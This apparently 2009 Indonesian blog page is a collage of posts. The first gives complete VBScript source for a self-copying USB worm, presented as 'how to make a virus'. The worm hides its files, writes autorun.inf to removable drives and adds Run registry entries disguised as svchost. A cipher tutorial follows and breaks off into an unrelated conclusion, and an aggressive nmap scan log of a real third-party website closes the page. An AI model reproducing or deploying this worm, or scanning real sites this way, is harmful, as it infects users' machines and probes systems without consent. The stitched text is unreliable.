Selasa, 08 Desember 2009

cara pembuatan virus dan penanggulangannya

‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe ryu.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\ryu.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\ryu.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\ryu.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\ryu.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\ryu.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\ryu.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\ryu.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3?
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tiba di virus camp_luck” & vbcrlf & _
“mor njajal” & vbcrlf & _
“permainan ae” & vbcrlf & _
“dolananne cah gaul” & vbcrlf & _
vbcrlf & vbcrlf & _
” asdsdasd” & vbcrlf & vbcrlf & _
” aaa asdsdasdas”
loop


buat tipe text ya jadi autorun.inf dengan cara rename
terus di safe


Anti Virusnya HApus aja yang berbau angka
hehhe

Senin, 09 November 2009

1.teknik cipher substitusi & transpose

KRIPTOGRAFI
Posted by Irma14 at 3:02 AM . Saturday, November 1, 2008
Labels: Keamanan-Komputer

Kriptografi, secara umum adalah ilmu dan seni untuk menjaga kerahasiaan berita [bruce Schneier - Applied Cryptography]. Selain pengertian tersebut terdapat pula pengertian ilmu yang mempelajari teknik-teknik matematika yang berhubungan dengan aspek keamanan informasi seperti kerahasiaan data, keabsahan data, integritas data, serta autentikasi data [A. Menezes, P. van Oorschot and S. Vanstone - Handbook of Applied Cryptography].

Kriptografi memiliki sejarah yang panjang, dalam bagian ini kita akan membahas secara singkat masalah penting tentang kriptografi.
Ada beberapa istilah – istilah yang digunakan dalam kriptografi :
- Plaintext :Pesan yang harus dienkripsi, ditransformasikan oleh suatu kunci
- Ciphertext :Output pesan yang telah dienkripsi
- Criptanalysis :Seni memecahkan sandi
- Criptography :Seni membuat atau memasang sandi
- Cryptology :Seni membuat atau memechakan sandi secara kolektif

Berdasarkan historisnya, metoda enkripsi dibagi menjadi dua bagian :


CHIPER SUBTITUSI
Pada suatu cipher substitusi masing – masing huruf atau kelompok akan digantikan dengan huruf atau kelompok huruf lainnya untuk disamarkan.
Salah satu cipher paling tua dikenal dengan sebutan Cipher Caesar yang dikaitkan dengan Julius Caesar, dalam Cipher ini plaintext diberikan dalam huruf kecil sedangkan Ciphertext diberikan dalam huruf besar.
Penyempurnaan berikutnya adalah dengan menizinkan penggunaan symbol didalam plaintext misalnya :
Plaintext : abcdefghijklmnopqrstuvwxyz
Ciphertext : QWERTYUIOPASDFGHJKLZXCVBNM
System umum ini biasa disebut Substitusi Monoalphabetis, yang berkaitan dengan alphabet
Dengan kunci diatas maka plaintext “attack” akan ditransformasikan kedalam ciphertext menjadi “QZZQEA”

CHIPER TRANSPOSISI
Chiper Substitusi menjaga urutan symbol Plain Text namun menyembunyikan hal itu. Sebaliknya dengan chiper Transposisi mengurutkan kembali huruf namun tidak menyembunyikannya. Gambar dibawah ini menjelaskan chiper transposisi yang umum yaitu kolom. Chiper dikunci oleh suatu kata atau frasa yang tidak memiliki huruf yang sama. Dalam contoh dibawah ini kuncinya adalah “MEGABUCK”.
Penggunaan kunci ditujukan untuk memberi nomor pada kolom, kolom 1 terletak pada kunci yang terdekat dengan awal alfabet, dst

Plain Text ditulis secara horisontal dalam baris, chiper dibaca berdasarkan kolom yang diawali dengan kolom yang mempunyai huruf terkecil.
M E G A B U C K
7 4 5 1 2 8 3 6
p l e a s E t r
a n s f e R o n
e m i l l I o n
d o l l a R s t
o m y s w I s s
b a n k a C c o
u n t s i X t w
o t w o a B c d

Sehingga didapatkan

- Plain text dari cipher tersebut adalah :
Pleasetransferonemilliondollarstomyswissbankaccountssixtwotwo
- dengan Chiper Text :
AFLLS KSOSELAWA IATOOS SCTCLNM OMANT ESILYNTW RNNT SOWDPAEDO BUOE RIRI CXB

6.1. Kesimpulan
Berdasarkan percobaan dan analisis yang sudah
dituliskan di atas, penulis bisa menarik beberapa
kesimpulan terkait Vigènere chiper dengan modifikasi
Fibonacci.
 Vigènere chiper dengan modifikasi Fibonacci
lebih baik daripada Vigènere chiper biasa karena
menghilangkan perulangan kunci yang
digunakan.
 Vigènere chiper dengan modifikasi Fibonacci
sangat kuat terhadap serangan chipertext-only,
berupa teknik analisis frekuensi ataupun metode
Kasiski.
 Vigènere chiper dengan modifikasi Fibonacci
sangat rawan terhadap serangan known-plaintext
dan chosen-plaintext.

pengalaman menggunakan nmap

1. www.mymalaysia.net.my










lebih lengkap nya
C:\>nmap -T Aggressive -A -v www.mymalaysia.net.my

Starting Nmap 4.68 ( http://nmap.org ) at 2009-11-10 11:58 SE Asia Standard Time

Initiating Ping Scan at 11:58
Scanning 65.254.49.77 [2 ports]
Completed Ping Scan at 11:58, 0.97s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:58
Completed Parallel DNS resolution of 1 host. at 11:58, 0.33s elapsed
Initiating SYN Stealth Scan at 11:58
Scanning 65.254.49.77 [1715 ports]
Discovered open port 21/tcp on 65.254.49.77
Discovered open port 25/tcp on 65.254.49.77
Discovered open port 53/tcp on 65.254.49.77
Discovered open port 80/tcp on 65.254.49.77
Discovered open port 443/tcp on 65.254.49.77
Discovered open port 995/tcp on 65.254.49.77
Completed SYN Stealth Scan at 11:59, 51.67s elapsed (1715 total ports)
Initiating Service scan at 11:59
Scanning 6 services on 65.254.49.77
Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 12:00 (0:00:04 remaining)
Completed Service scan at 12:00, 24.61s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 65.254.49.77
Retrying OS detection (try #2) against 65.254.49.77
Initiating Traceroute at 12:00
65.254.49.77: guessing hop distance at 1
Completed Traceroute at 12:00, 0.00s elapsed
Initiating Parallel DNS resolution of 3 hosts. at 12:00
Completed Parallel DNS resolution of 3 hosts. at 12:00, 0.67s elapsed
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 12:00
Completed SCRIPT ENGINE at 12:01, 32.34s elapsed
Host 65.254.49.77 appears to be up ... good.
Interesting ports on 65.254.49.77:
Not shown: 1708 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
|_ Anonymous FTP: FTP: Anonymous login allowed
|_ FTP bounce check: bounce working!
25/tcp open smtp?
| SMTPcommands: EHLO milam.nswebhost.com Hello example.org [118.96.87.225], SIZ
E 52428800, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, 250 HELP
|_ HELP Commands supported:, , AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT
RSET HELP
37/tcp closed time
53/tcp open domain?
80/tcp open http?
| robots.txt: has 5 disallowed entries
|_ /admin/ /images/ /includes/ /plugins/ /skins/
|_ HTML title: About Malaysia - Home
443/tcp open https?
|_ HTML title: Site doesn't have a title.
995/tcp open pop3s?
|_ SSLv2: server still supports SSLv2
Device type: general purpose|switch
Running (JUST GUESSING) : Microsoft Windows 2000|2003|XP (89%), Xylan embedded (
85%)
Aggressive OS guesses: Microsoft Windows 2000 Server SP4 (89%), Microsoft Window
s Server 2003 SP1 or SP2 (87%), Microsoft Windows XP Embedded SP2 (87%), Microso
ft Windows XP SP2 (87%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows Ser
ver 2003 SP0 or Windows XP SP2 (85%), Xylan OmniStack switch (version 3.2.5) (85
%), Xylan OmniStack switch (version 3.4.7) (85%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 0.00 65.254.49.77

Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.656 seconds
Raw packets sent: 3515 (158.926KB) | Rcvd: 92 (5160B)